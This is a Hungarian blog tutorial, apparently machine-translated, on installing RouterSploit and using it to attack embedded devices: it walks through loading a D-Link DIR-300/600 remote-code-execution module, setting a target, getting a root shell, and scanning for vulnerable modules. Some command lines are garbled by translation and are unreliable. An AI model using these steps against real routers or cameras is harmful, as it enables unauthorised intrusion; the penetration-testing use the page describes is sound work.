itthon » Linux eszközök » RouterSploit – Az Exploitation Framework teljes oktatóanyaga [2020]

RouterSploit – Az Exploitation Framework teljes oktatóanyaga [2020]

által A Suyash
routersploit

RouterSploit egy csodálatos kihasználó keretrendszer, amely kifejezetten beágyazott eszközökhöz készült.

Ezt az eszközt a Pentester használhatja a kamerák és útválasztók biztonsági ellenőrzésére.

A RouterSploit kiemeli:

  • Pythonban kódolva.
  • Parancssori interfész.
  • Docker támogatás.
  • Moduláris eszközök.

Támogatott operációs rendszer:

  1. Mac operációs rendszer.
  2. Linux.
  3. Android telefon.
  4. ablakok.

A RouterSploit telepítése:

Követelmények:

  • jövőbeli
  • kéréseket
  • Paramic
  • Stop
  • pycrypto

Választható:

  • kékes – bluetooth alacsony energiafogyasztás

Telepítés Kali Linux alatt:

Kövesse az alábbi parancsokat:

apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py

Bluetooth Low Energy támogatás:

apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Telepítés Ubuntuban:

Kövesse az alábbi parancsokat:

sudo add-apt-repository universe
sudo apt-get install git python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install setuptools
python3 -m pip install -r requirements.txt
python3 rsf.py

Bluetooth Low Energy támogatás:

apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Telepítés MacOS-ra:

Kövesse az alábbi parancsokat:

git clone https://www.github.com/threat9/routersploit
cd routersploit
sudo python3 -m pip install -r requirements.txt
python3 rsf.py

Telepítés a Dockerre:

Kövesse az alábbi parancsokat:

git clone https://www.github.com/threat9/routersploit
cd routersploit
docker build -t routersploit .
docker run -it --rm routersploit

A RouterSploit frissítése?

A kellemetlenségek elkerülése érdekében gyakran frissítenie kell a RouterSploit szolgáltatást.

Szinte minden nap szállítanak új modulokat.

cd routersploit
git pull

A RouterSploit használata?

Használat

root@kalidev:~/git/routersploit# ./rsf.py
 ______ _ _____ _ _ _
 | ___ \          | |          /  ___|     | |     (_) |
 | |_/ /___ _ _| |_ ___ _ __ `--. _ __ | | ___ _| |_
 |    // _ \| | | | __/ _ \ '__|`--. \ '_ \| |/ _ \| | __|
 | |\ \ (_) | |_| | ||  __/ |  /\__/ / |_) | | (_) | | |_
 _| \____/ __,_|\_____|_|  \____/| .__/|_|\___/|_|\__|
                                     | |
       Exploitation Framework for    |_|   a Threat9 által
            Beágyazott eszközök
  
 Kódnév   : Tudtam, hogy bajban vagy
 Verzió    : 3.3.0
 Kezdőlap   : https://www.threat9.com/ - @threatnine
 Csatlakozz a Slackhez : routersploit.slack.com

 Csatlakozzon a Threat9 bétaprogramhoz - https://www.threat9.com/

 Kizsákmányolás: 128 Szkennerek: 4 Creds: 165 Általános: 4 Hasznos terhek: 32 Kódolók: 6

rsf >

Kizsákmányolás:

A kizsákmányolás előkészítéséhez, csak válassza ki a modult, és állítsa be a célt:

rsf > használ exploit/
exploits/2wire/ exploits/asmax/ exploits/asus/ exploits/cisco/ exploits/dlink/ exploits/fortinet/ exploits/juniper/ exploits/linksys/ exploits/multi/ exploits/netgear/
rsf > használja az exploits/dlink/dir_300_600_rce
rsf (D-LINK DIR-300 & DIR-600 RCE) >

A befejezéshez használja a tabulátor billentyűt.

Az opciók megjelenítéséhez, beírshow:

rsf (D-LINK DIR-300 & DIR-600 RCE) > opciók megjelenítése

Célzási lehetőségek:


   Név Aktuális beállítások Leírás                                
   ----       ----------------     -----------                                
   cél Célcím pl. http://192.168.1.1     
   kikötő       80                   Cél port

Használatrun vagyexploit parancsot a cél kihasználásához:

rsf (D-LINK DIR-300 & DIR-600 RCE) > fut
[+] A cél sérülékeny
[*] Parancshurok meghívása...
cmd > whoami
gyökér

Opciók beállításához:

rsf (D-LINK DIR-300 & DIR-600 RCE) > cél http beállítása://192.168.1.1 [+] {'target': 'http://192.168.1.1'}

Lehetőség van ellenőrizni, hogy a célpont sebezhető-e egy adott kizsákmányolással szemben:

rsf (D-LINK DIR-300 & DIR-600 RCE) > ellenőrzés
[+] A cél sérülékeny

Futshow info a kihasználással kapcsolatos információk megjelenítéséhez.

Sebezhető célpontok keresése:

A szkennerek segítségével gyorsan ellenőrizhető, hogy a célpont sebezhető-e bármilyen kizsákmányolással szemben.

Ugyanazokat a parancsokat használja az opciók megjelenítéséhez/beállításához, és futni is.

rsf (D-Link szkenner) > fut
[+] Az exploits/dlink/dwr_932_info_disclosure sebezhető
[-] Az exploits/dlink/dir_300_320_615_auth_bypass nem sérülékeny
[-] Az exploits/dlink/dsl_2750b_info_disclosure nem sérülékeny
[-] Az exploits/dlink/dns_320l_327l_rce nem sérülékeny
[-] Az exploits/dlink/dir_645_password_disclosure nem sérülékeny
[-] Az exploits/dlink/dir_300_600_615_info_disclosure nem sebezhető
[-] Az exploits/dlink/dir_300_600_rce nem sérülékeny

[+] Az eszköz sebezhető!
- exploits/dlink/dwr_932_info_disclosure

Hivatalos RouterSploit

Olvassa el is: 1337x proxy

Végső szavak:

RouterSploit egy csodálatos eszköz a használatra.

Ha bármilyen problémával szembesül a RouterSploit. Ne felejtse el kommentálni lent. A CSHAWK csapatunk a lehető leghamarabb felveszi Önnel a kapcsolatot.

Szólj hozzá